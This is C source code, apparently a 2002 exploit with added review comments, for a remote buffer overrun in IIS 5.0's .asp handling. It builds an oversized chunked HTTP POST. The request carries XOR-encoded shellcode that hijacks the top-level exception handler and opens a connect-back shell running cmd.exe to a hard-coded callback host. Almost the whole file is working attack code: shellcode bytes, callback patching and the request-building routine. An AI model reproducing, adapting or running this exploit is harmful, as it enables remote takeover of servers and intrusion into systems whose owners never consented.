
  1.  
  2. /*
  3.  IIS5.0 .asp overrun remote exploit
  4.  Programmed by hsj  : 02.04.14
  5.  
  6.  code flow:
  7.   overrun -> exception -> rewrite top-level handler ->
  8.   exception -> shellcode -> make back channel ->
  9.   exec cmd.exe
  10. */
  11. #include <stdio.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14. #include <signal.h>
  15. #include <sys/types.h>
  16. #include <sys/socket.h>
  17. #include <sys/ioctl.h>
  18. #include <sys/time.h>
  19. #include <sys/wait.h>
  20. #include <errno.h>
  21. #include <unistd.h>
  22. #include <fcntl.h>
  23. #include <netinet/in.h>
  24. #include <limits.h>
  25. #include <netdb.h>
  26. #include <arpa/inet.h>
  27.  
  28. #define RET                 0x0045C560  /* our payload. ugh, direct
  29. jump!!!#$% */
  30. #define REWRITE             0x77eaf44c  /* top-level exception handler */
  31.  
  32. #define PORT                25
  33. #define ADDR                "attacker.mydomain.co.jp"
  34. #define PORT_OFFSET         518
  35. #define ADDR_OFFSET         523
/*
 * Opaque payload bytes; treat as data, not code to be reasoned about here.
 *
 * main() uses this array as a C string: its length is taken with strlen(),
 * so the byte sequence must contain no 0x00 (it currently does not), and
 * main() overwrites two fields inside it at PORT_OFFSET and ADDR_OFFSET
 * (XOR-masked with 0x95 per byte) before use.  The two section markers
 * ("decoder" / "code") are the author's; nothing in this file documents
 * the boundary further.
 */
unsigned char shellcode[]=
/* decoder */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1d\x8d\xa0\xf0"
"\xfb\xff\xff\x83\xe4\xfc\x8d\x6c\x24\x10\x33\xc9\x66\xb9\x85\x02"
"\x80\x30\x95\x40\xe2\xfa"
/* code */
"\x7d\x21\x95\x95\x95\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
"\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7\xec\xd4"
"\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd6\xe7\xf0\xf4"
"\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb"
"\xf4\xf8\xf0\xf1\xc5\xfc\xe5\xf0\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc"
"\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0"
"\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9"
"\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xe2\xe6\xa7\xca\xa6\xa7"
"\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe"
"\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6"
"\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3"
"\x95\xf6\xf8\xf1\xbb\xf0\xed\xf0\x95\xcf\xc7\x2e\x95\x95\x65\xe2"
"\x14\xae\xd8\xcf\x05\x95\xe1\x96\xde\x7e\x60\x1e\xe6\xa9\x96\x66"
"\x1e\xe3\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xc3\xa6\x55"
"\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\xa6\x5c\x24\x9b\x66\x33\xcc\xca"
"\xe1\x9d\x16\x52\x91\xd5\x77\x7d\x6a\x74\xcb\x1e\xc3\xb1\x96\x46"
"\x44\x75\x96\x57\xa6\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74"
"\x97\x96\x54\x1e\x85\x96\x46\xcb\x1e\x6b\xa6\x5c\x24\x9c\x7d\xdf"
"\x94\x95\x95\x16\x53\x99\xc7\xc3\x6a\xc2\x49\xcf\x1e\x4d\xa6\x5c"
"\x24\x93\x7d\xa3\x94\x95\x95\x16\x53\x90\x52\xd0\x95\x99\x95\x95"
"\x95\x52\xd0\x91\x95\x95\x95\x95\x52\xd0\x9d\x94\x95\x95\x95\xff"
"\x95\xc0\x18\xd0\x65\xc5\x18\xd0\x61\xc5\x6a\xc2\x5d\xff\x95\xc0"
"\x18\xd0\x6d\xc5\x18\xd0\x69\xc5\x6a\xc2\x5d\xa6\x55\xa6\x5c\x24"
"\x84\xc2\x1e\x68\x66\x3e\xca\x52\xd0\x95\xd1\x95\x95\x95\x1e\xd0"
"\x65\x1c\xd0\xa9\x1c\xd0\xd5\x1e\xd0\x69\x1c\xd0\xad\x52\xd0\xb9"
"\x94\x94\x95\x95\x18\xd0\xd1\xc5\xc0\xc4\xc4\xc4\xd4\xc4\xdc\xc4"
"\xc4\xc3\xc4\x6a\xc2\x59\x6a\xe0\x65\x6a\xc2\x71\x6a\xe0\x69\x6a"
"\xc2\x71\xc0\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x30"
"\x95\x95\x95\xc5\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11"
"\x01\x95\x95\x95\x1e\x4d\xf3\x52\xd0\x95\x97\x95\xf3\x52\xd0\x97"
"\x2e\x3f\x52\xd0\x91\x48\x59\x2e\x3f\xff\x85\xc0\xc6\x6a\xc2\x61"
"\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc2\xc4\xc4\xc4\x6a\xe0\x61\x6a"
"\xc2\x45\x10\x55\xe1\xcb\x05\x05\x05\x05\x16\xaa\x95\xe1\xba\x05"
"\x05\x05\x05\xff\x95\xc2\xfd\x95\x91\x95\x95\xc0\x6a\xe0\x61\x6a"
"\xc2\x4d\x10\x55\xe1\xab\x05\x05\x05\x05\xff\x95\x6a\xa2\xc0\xc6"
"\x6a\xc2\x6d\x16\x6d\x6a\xe1\xb9\x05\x05\x05\x05\x7e\x27\xff\x95"
"\xfd\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xeb\x83\x05\x05"
"\x05\x05\xff\x95\xc2\xc5\xc0\x6a\xe0\x6d\x6a\xc2\x41\xff\xa7\x6a"
"\xc2\x49\x7e\x19\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\x1f\x93\xd3"
"\x11\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x1c\x92\xd2\xd2"
"\xd2\xd2\x77\x7c\x56";
  83.  
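/*
 * Resolve a dotted-quad string or a host name to an IPv4 address.
 *
 * name: NUL-terminated dotted-quad ("10.0.0.1") or host name; NULL is
 *       tolerated and treated as a failure.
 * Returns the address in network byte order, or 0 when the name cannot be
 * parsed or does not resolve to an AF_INET address.  As in the original,
 * "0.0.0.0" is therefore indistinguishable from failure.
 *
 * Fixes over the original: inet_pton() is used instead of inet_addr(), so
 * "255.255.255.255" (which inet_addr() reports as INADDR_NONE) resolves
 * rather than being treated as an error; and the gethostbyname() result is
 * copied only after checking it really is an AF_INET address of the expected
 * length, instead of blindly copying 4 bytes.
 */
unsigned int resolve(const char *name)
{
    struct in_addr parsed;
    unsigned int ip = 0;

    if (name == NULL)
        return 0;

    /* Numeric form first: no name-service lookup for a literal address. */
    if (inet_pton(AF_INET, name, &parsed) == 1)
        return parsed.s_addr;

    struct hostent *he = gethostbyname(name);
    if (he == NULL || he->h_addrtype != AF_INET ||
        he->h_length != (int)sizeof ip || he->h_addr_list[0] == NULL)
        return 0;

    memcpy(&ip, he->h_addr_list[0], sizeof ip);
    return ip;
}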
  97.  
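/*
 * Open a TCP connection to address:port with a 10-second connect timeout.
 *
 * address: dotted-quad or host name, resolved with resolve().
 * port:    TCP port in host byte order; values outside 1..65535 are rejected.
 * Returns a connected socket descriptor (>= 0), left in blocking mode and
 * owned by the caller, or a negative code:
 *   -1  socket()/fcntl() failure, or port out of range
 *   -2  address did not resolve
 *   -3  select() or getsockopt() failed
 *   -4  connect timed out
 *   -5  connect failed (refused, unreachable, ...); errno holds the reason
 *
 * Fixes over the original: the unused `server` address is gone; `target` is
 * zeroed before use; connect()'s immediate failure is no longer ignored;
 * the descriptor is checked against FD_SETSIZE before FD_SET(); getsockopt()
 * takes a socklen_t and its return value is checked; and blocking mode is
 * restored explicitly rather than by reusing the SO_ERROR value as the
 * FIONBIO flag.
 */
int make_connection(char *address,int port)
{
    struct sockaddr_in target;
    fd_set wd;
    struct timeval tv;
    int s, ready, soerr, flags;
    socklen_t len;

    if (port < 1 || port > 65535)
        return -1;

    s = socket(AF_INET,SOCK_STREAM,0);
    if (s < 0)
        return -1;
    /* select() cannot represent descriptors at or beyond FD_SETSIZE. */
    if (s >= FD_SETSIZE) {
        close(s);
        return -1;
    }

    memset(&target, 0, sizeof target);
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if (target.sin_addr.s_addr == 0) {
        close(s);
        return -2;
    }
    target.sin_port = htons((unsigned short)port);

    /* Non-blocking connect so the wait can be bounded by select(). */
    flags = fcntl(s, F_GETFL, 0);
    if (flags < 0 || fcntl(s, F_SETFL, flags | O_NONBLOCK) < 0) {
        close(s);
        return -1;
    }

    if (connect(s, (struct sockaddr *)&target, sizeof target) < 0 &&
        errno != EINPROGRESS) {
        int saved = errno;
        close(s);
        errno = saved;
        return -5;
    }

    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);
    ready = select(s + 1, NULL, &wd, NULL, &tv);
    if (ready < 0) {
        close(s);
        return -3;
    }
    if (ready == 0) {
        close(s);
        return -4;
    }

    /* Writable means the connect finished; SO_ERROR says whether it succeeded. */
    soerr = 0;
    len = sizeof soerr;
    if (getsockopt(s, SOL_SOCKET, SO_ERROR, &soerr, &len) < 0 ||
        len != sizeof soerr) {
        close(s);
        return -3;
    }
    if (soerr != 0) {
        close(s);
        errno = soerr;
        return -5;
    }

    /* Hand the descriptor back in blocking mode, as the original did. */
    if (fcntl(s, F_SETFL, flags) < 0) {
        close(s);
        return -1;
    }
    return s;
}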
  149.  
/*
 * Entry point.  argv[1] = target host, argv[2] = target port, argv[3] =
 * optional request path (default "/iisstart.asp").  Builds one HTTP POST
 * whose query string carries the oversized buffer described in the file
 * header, writes it to the target, and hex-dumps what was sent.
 *
 * Returns 0 after sending; -1 on usage error; -2 if the compile-time ADDR
 * does not resolve; -3 if the connection fails; -4 if the patched payload
 * contains a byte the request cannot carry raw.
 *
 * NOTE(review): several constructs below are undefined or non-portable C and
 * are left as written: type-punned, possibly unaligned stores through
 * (unsigned int *) / (unsigned short *) casts (memcpy is the portable form),
 * the assumption that sizeof(int) == 4 and, for the RET/REWRITE stores, a
 * little-endian host; signed/unsigned comparisons against strlen()/sizeof;
 * and an unchecked write().
 */
int main(int argc,char *argv[])
{
    int i,j,s;
    unsigned int cb;                      /* callback address, network byte order */
    unsigned short port;                  /* callback port, network byte order */
    char buf[8192],buf2[16384],path[256]; /* payload, whole request, request path */

    if(argc<3)
    {
        printf("usage :$ %s ip port [asp-path]\n",argv[0]);
        return -1;
    }
    /* strncpy() leaves path unterminated when argv[3] fills it, hence the explicit NUL. */
    if(argc>3)
    {
        strncpy(path,argv[3],sizeof(path));
        path[sizeof(path)-1] = 0;
    }
    else
        strcpy(path,"/iisstart.asp");

    /* ADDR is fixed at compile time (see the #define block); 0 means it did not resolve. */
    if(!(cb=resolve(ADDR)))
        return -2;

    /* atoi() reports no errors: a non-numeric argv[2] silently becomes port 0. */
    s = make_connection(argv[1],atoi(argv[2]));
    if(s<0)
    {
        printf("connect error:[%d].\n",s);
        return -3;
    }

    /*
     * Patch the callback port and address into shellcode[] at fixed offsets,
     * XOR-masked with 0x95 per byte (the same constant recurs as 0x9595 and
     * 0x95959595).  shellcode[] is measured with strlen(), so its length
     * depends on it containing no 0x00 byte.
     */
    j = strlen(shellcode);
    port = htons(PORT);
    port ^= 0x9595;
    cb ^= 0x95959595;
    *(unsigned short *)&shellcode[PORT_OFFSET] = port;   /* type-punned, possibly unaligned store (UB) */
    *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;       /* type-punned, possibly unaligned store (UB) */
    /*
     * Scan the patched bytes for characters the request cannot carry raw:
     * 0x09..0x0d (whitespace), '%', '+' and '='.  Only the two patched fields
     * can introduce them, hence the error text below.  strlen() is
     * re-evaluated on every iteration although j already holds it.
     */
    for(i=0;i<strlen(shellcode);i++)
    {
        if(((shellcode[i]>=0x09)&&(shellcode[i]<=0x0d))||
           (shellcode[i]==0x25)||(shellcode[i]==0x2b)||
           (shellcode[i]==0x3d))
            break;
    }
    if(i!=j)
    {
        printf("bad portno or ip address...\n");
        close(s);
        return -4;
    }

    /*
     * Layout of buf: a repeated two-byte filler, then 12 bytes of 0x41, then
     * shellcode[] flush against the terminating NUL.  The loop bound is
     * size_t arithmetic compared with the int i; when that bound is odd the
     * filler runs one byte past it and the last 0x41 is overwritten by the
     * memcpy() below.  Every write stays inside buf either way.
     */
    for(i=0;i<sizeof(buf)-strlen(shellcode)-12-1;)
    {
        buf[i++] = 0xeb;
        buf[i++] = 0x06;
    }
    *(unsigned int *)&buf[i] = 0x41414141;       /* possibly unaligned stores (UB) */
    *(unsigned int *)&buf[i+4] = 0x41414141;
    *(unsigned int *)&buf[i+8] = 0x41414141;

    memcpy(&buf[sizeof(buf)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    buf[sizeof(buf)-1] = 0;
    /*
     * Chunked POST with buf as the raw query string.  The result fits buf2
     * by construction (fixed text + path < 256 + buf < 8192, well under
     * 16384); snprintf() would make that bound explicit.
     */
    sprintf(buf2,"POST %s?%s HTTP/1.0\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n"
                 "Transfer-Encoding: chunked\r\n\r\n"
                 "10\r\nABCDEFGHIJKLMNOP\r\n"
                 "4\r\nXXXX\r\n"
                 "4\r\nYYYY\r\n"
                 "0\r\n\r\n\r\n",
                 path,buf);
    j = strlen(buf2);
    /*
     * Overwrite the XXXX / YYYY placeholders in the body with RET / REWRITE.
     * strstr() returns the first match, so if path or buf carried "XXXX" or
     * "YYYY" earlier in the request that occurrence would be patched instead
     * (the fixed filler bytes cannot form either).  Neither result is
     * NULL-checked.
     */
    *(unsigned int *)strstr(buf2,"YYYY") = REWRITE;
    *(unsigned int *)strstr(buf2,"XXXX") = RET;
    write(s,buf2,j);                             /* return value (error or short write) ignored */

    /* Hex dump of the request as sent; &0xff stops a signed char from sign-extending. */
    printf("---");
    for(i=0;i<j;i++)
    {
        if((i%16)==0)
            printf("\n");
        printf("%02X ",buf2[i]&0xff);
    }
    printf("\n---\n");

    /* Pause, presumably to let the server act before the socket is torn down; 2 == SHUT_RDWR. */
    sleep(3);
    shutdown(s,2);
    close(s);

    printf("Done.\n");

    return 0;
}